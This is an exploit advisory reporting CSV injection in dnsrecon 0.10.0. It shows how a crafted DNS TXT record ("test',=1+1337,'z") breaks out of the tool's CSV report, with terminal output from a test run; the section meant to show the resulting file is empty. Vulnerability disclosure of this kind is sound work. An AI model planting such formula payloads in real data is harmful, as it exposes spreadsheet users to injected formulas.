Authored by Dolev Farhi

dnsrecon version 0.10.0 suffers from a CSV injection vulnerability.

# Exploit Title: dnsrecon 0.10.0 - CSV Injection
# Author: Dolev Farhi
# Date: 2021-01-07
# Vendor Homepage:
# Version : 0.10.0
# Tested on: ParrotOS 4.10

dnsrecon, when scanning a TXT record such as SPF, i.e.:, outputs a CSV report (-c out.csv) with entries such as Type,Name,Address,Target,Port and String.
A TXT record allows many characters including single quote and equal signs, it's possible to escape the CSV structure by creating a TXT record in the following way: "test',=1+1337,'z"

user@parrot-virtual:~$ sudo dnsrecon -d -c ./file.csv -n
[*] Performing General Enumeration of Domain:
[-] DNSSEC is not configured for
[*] SOA
[-] Could not Resolve NS Records for
[-] Could not Resolve MX Records for
[*] TXT test',=1+1337,'z
[*] Enumerating SRV Records
[+] 0 Records Found
[*] Saving records to CSV file: ./file.csv
{'type': 'SOA', 'mname': '', 'address': ''}
{'type': 'TXT', 'name': '', 'strings': "test',=1+1337,'z"}

This output will then be rewritten into a CSV with this structure:


The flexibility of TXT record allows many variants of formulas to be injected, from RFC1464

Attribute Values
All printable ASCII characters are permitted in the attribute value.